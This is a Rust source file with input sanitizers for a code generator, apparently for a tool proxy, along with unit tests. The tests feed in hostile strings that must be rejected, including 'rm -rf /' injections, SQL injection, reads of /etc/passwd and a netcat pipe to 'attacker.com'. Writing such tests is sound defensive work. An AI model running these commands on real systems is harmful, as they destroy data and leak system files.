use crate::error::{ProxyError, ProxyResult};
const MAX_IDENTIFIER_LENGTH: usize = 128;
pub fn sanitize_identifier(name: &str) -> ProxyResult<String> {
if name.is_empty() {
return Err(ProxyError::codegen(
"Identifier cannot be empty".to_string(),
));
}
if name.len() > MAX_IDENTIFIER_LENGTH {
return Err(ProxyError::codegen(format!(
"Identifier '{}' exceeds maximum length of {} characters",
truncate_for_display(name, 50),
MAX_IDENTIFIER_LENGTH
)));
}
syn::parse_str::<syn::Ident>(name).map_err(|e| {
ProxyError::codegen(format!(
"Invalid Rust identifier '{}': {}\n\
\n\
Identifiers must:\n\
- Start with a letter or underscore\n\
- Contain only letters, numbers, and underscores\n\
- Not be a Rust reserved keyword\n\
\n\
Reserved keywords include: async, await, fn, impl, let, match, struct, type, etc.\n\
See: https://doc.rust-lang.org/reference/keywords.html",
truncate_for_display(name, 50),
e
))
})?;
Ok(name.to_string())
}
#[must_use]
pub fn is_rust_keyword(s: &str) -> bool {
syn::parse_str::<syn::Ident>(s).is_err()
&& s.chars().all(|c| c.is_alphanumeric() || c == '_')
&& s.chars().next().is_some_and(|c| c.is_alphabetic() || c == '_')
}
#[must_use]
pub fn sanitize_string_literal(s: &str) -> String {
let mut result = String::with_capacity(s.len() + 10);
for ch in s.chars() {
match ch {
'"' => result.push_str("\\\""),
'\\' => result.push_str("\\\\"),
'\n' => result.push_str("\\n"),
'\r' => result.push_str("\\r"),
'\t' => result.push_str("\\t"),
'\0' => result.push_str("\\0"),
ch if ch.is_control() => {
use std::fmt::Write;
let _ = write!(result, "\\u{{{:04x}}}", ch as u32);
}
ch => result.push(ch),
}
}
result
}
pub fn sanitize_type(type_str: &str) -> ProxyResult<String> {
if type_str.is_empty() {
return Err(ProxyError::codegen("Type cannot be empty".to_string()));
}
if type_str.len() > MAX_IDENTIFIER_LENGTH * 2 {
return Err(ProxyError::codegen(format!(
"Type '{}' exceeds maximum length",
truncate_for_display(type_str, 50)
)));
}
let dangerous_patterns = [
";", "//", "/*", "*/", "{", "}", "()", "fn ", "macro ", "impl ", "trait ",
];
for pattern in &dangerous_patterns {
if type_str.contains(pattern) {
return Err(ProxyError::codegen(format!(
"Invalid type '{}': Contains suspicious pattern '{}'",
truncate_for_display(type_str, 50),
pattern
)));
}
}
for ch in type_str.chars() {
if !ch.is_ascii_alphanumeric() && !matches!(ch, '_' | ':' | '<' | '>' | ',' | ' ') {
return Err(ProxyError::codegen(format!(
"Invalid type '{}': Contains invalid character '{}'",
truncate_for_display(type_str, 50),
ch
)));
}
}
Ok(type_str.to_string())
}
pub fn sanitize_uri(uri: &str) -> ProxyResult<String> {
if uri.is_empty() {
return Err(ProxyError::codegen("URI cannot be empty".to_string()));
}
for (i, ch) in uri.chars().enumerate() {
if ch.is_control() || ch == '"' || ch == '\\' {
return Err(ProxyError::codegen(format!(
"Invalid URI '{}': Contains invalid character at position {} ('{}')",
truncate_for_display(uri, 50),
i,
ch
)));
}
}
Ok(uri.to_string())
}
fn truncate_for_display(s: &str, max_len: usize) -> String {
if s.len() <= max_len {
s.to_string()
} else {
format!("{}...", &s[..max_len])
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_valid_identifiers() {
assert!(sanitize_identifier("my_tool").is_ok());
assert!(sanitize_identifier("Tool123").is_ok());
assert!(sanitize_identifier("_private").is_ok());
assert!(sanitize_identifier("__internal").is_ok());
assert!(sanitize_identifier("snake_case_name").is_ok());
assert!(sanitize_identifier("PascalCase").is_ok());
assert!(sanitize_identifier("camelCase").is_ok());
assert!(sanitize_identifier("SCREAMING_SNAKE").is_ok());
}
#[test]
fn test_reject_empty_identifier() {
assert!(sanitize_identifier("").is_err());
}
#[test]
fn test_reject_keywords() {
assert!(sanitize_identifier("async").is_err());
assert!(sanitize_identifier("await").is_err());
assert!(sanitize_identifier("fn").is_err());
assert!(sanitize_identifier("impl").is_err());
assert!(sanitize_identifier("let").is_err());
assert!(sanitize_identifier("match").is_err());
assert!(sanitize_identifier("struct").is_err());
assert!(sanitize_identifier("type").is_err());
}
#[test]
fn test_reject_invalid_start() {
assert!(sanitize_identifier("123invalid").is_err());
assert!(sanitize_identifier("9tool").is_err());
}
#[test]
fn test_reject_invalid_characters() {
assert!(sanitize_identifier("has-dash").is_err());
assert!(sanitize_identifier("has.dot").is_err());
assert!(sanitize_identifier("has space").is_err());
assert!(sanitize_identifier("has@symbol").is_err());
assert!(sanitize_identifier("has#hash").is_err());
assert!(sanitize_identifier("has$dollar").is_err());
}
#[test]
fn test_reject_code_injection() {
assert!(sanitize_identifier(r#"evil"); system("rm -rf /"); ("#).is_err());
assert!(sanitize_identifier(r#"tool") { Command::new("rm")"#).is_err());
assert!(sanitize_identifier("'; DROP TABLE tools; --").is_err());
}
#[test]
fn test_reject_path_traversal() {
assert!(sanitize_identifier("../../../etc/passwd").is_err());
assert!(sanitize_identifier("..\\..\\windows\\system32").is_err());
}
#[test]
fn test_reject_unicode_attacks() {
assert!(sanitize_identifier("evil\u{202E}code").is_err()); assert!(sanitize_identifier("test\0null").is_err());
}
#[test]
fn test_reject_too_long() {
let too_long = "a".repeat(MAX_IDENTIFIER_LENGTH + 1);
assert!(sanitize_identifier(&too_long).is_err());
}
#[test]
fn test_accept_max_length() {
let max_length = "a".repeat(MAX_IDENTIFIER_LENGTH);
assert!(sanitize_identifier(&max_length).is_ok());
}
#[test]
fn test_sanitize_string_basic() {
assert_eq!(sanitize_string_literal("hello"), "hello");
assert_eq!(sanitize_string_literal(""), "");
}
#[test]
fn test_sanitize_string_quotes() {
assert_eq!(
sanitize_string_literal("Hello \"world\""),
"Hello \\\"world\\\""
);
assert_eq!(sanitize_string_literal("Say \"hi\""), "Say \\\"hi\\\"");
}
#[test]
fn test_sanitize_string_backslash() {
assert_eq!(
sanitize_string_literal("path\\to\\file"),
"path\\\\to\\\\file"
);
}
#[test]
fn test_sanitize_string_newlines() {
assert_eq!(sanitize_string_literal("Line 1\nLine 2"), "Line 1\\nLine 2");
assert_eq!(sanitize_string_literal("A\r\nB"), "A\\r\\nB");
}
#[test]
fn test_sanitize_string_tabs() {
assert_eq!(sanitize_string_literal("Col1\tCol2"), "Col1\\tCol2");
}
#[test]
fn test_sanitize_string_null() {
assert_eq!(sanitize_string_literal("null\0byte"), "null\\0byte");
}
#[test]
fn test_sanitize_string_control_chars() {
assert_eq!(sanitize_string_literal("bell\x07"), "bell\\u{0007}");
}
#[test]
fn test_sanitize_string_injection_attempt() {
let malicious = r#"description"; system("rm -rf /"); ""#;
let sanitized = sanitize_string_literal(malicious);
assert!(sanitized.contains("\\\""));
assert_eq!(sanitized, r#"description\"; system(\"rm -rf /\"); \""#);
}
#[test]
fn test_valid_types() {
assert!(sanitize_type("String").is_ok());
assert!(sanitize_type("i64").is_ok());
assert!(sanitize_type("Vec<i64>").is_ok());
assert!(sanitize_type("Option<String>").is_ok());
assert!(sanitize_type("HashMap<String, Value>").is_ok());
assert!(sanitize_type("serde_json::Value").is_ok());
assert!(sanitize_type("std::collections::HashMap").is_ok());
}
#[test]
fn test_reject_type_injection() {
assert!(sanitize_type("String; drop_table()").is_err());
assert!(sanitize_type("Vec<i64>; system(\"rm\")").is_err());
assert!(sanitize_type("fn() -> ()").is_err());
assert!(sanitize_type("impl Trait").is_err());
}
#[test]
fn test_reject_empty_type() {
assert!(sanitize_type("").is_err());
}
#[test]
fn test_reject_type_with_braces() {
assert!(sanitize_type("String { field: value }").is_err());
}
#[test]
fn test_reject_type_comments() {
assert!(sanitize_type("String // comment").is_err());
assert!(sanitize_type("String /* comment */").is_err());
}
#[test]
fn test_valid_uris() {
assert!(sanitize_uri("file:///test/path").is_ok());
assert!(sanitize_uri("https://example.com/api").is_ok());
assert!(sanitize_uri("http://localhost:8080/resource").is_ok());
assert!(sanitize_uri("/relative/path").is_ok());
}
#[test]
fn test_reject_empty_uri() {
assert!(sanitize_uri("").is_err());
}
#[test]
fn test_reject_uri_with_quotes() {
assert!(sanitize_uri(r#"file:///test"; system("rm");"#).is_err());
}
#[test]
fn test_reject_uri_with_control_chars() {
assert!(sanitize_uri("file:///test\npath").is_err());
assert!(sanitize_uri("file:///test\0path").is_err());
}
#[test]
fn test_is_rust_keyword() {
assert!(is_rust_keyword("async"));
assert!(is_rust_keyword("fn"));
assert!(is_rust_keyword("struct"));
assert!(!is_rust_keyword("my_function"));
assert!(!is_rust_keyword("Tool"));
}
#[test]
fn test_sql_injection_attempts() {
assert!(sanitize_identifier("'; DROP TABLE tools; --").is_err());
assert!(sanitize_identifier("admin'--").is_err());
assert!(sanitize_identifier("1' OR '1'='1").is_err());
}
#[test]
fn test_command_injection_attempts() {
assert!(sanitize_identifier("tool; rm -rf /").is_err());
assert!(sanitize_identifier("tool && cat /etc/passwd").is_err());
assert!(sanitize_identifier("tool | nc attacker.com 4444").is_err());
}
#[test]
fn test_realistic_valid_names() {
assert!(sanitize_identifier("get_user").is_ok());
assert!(sanitize_identifier("search_documents").is_ok());
assert!(sanitize_identifier("calculate_sum").is_ok());
assert!(sanitize_identifier("send_email").is_ok());
assert!(sanitize_identifier("parse_json").is_ok());
}
}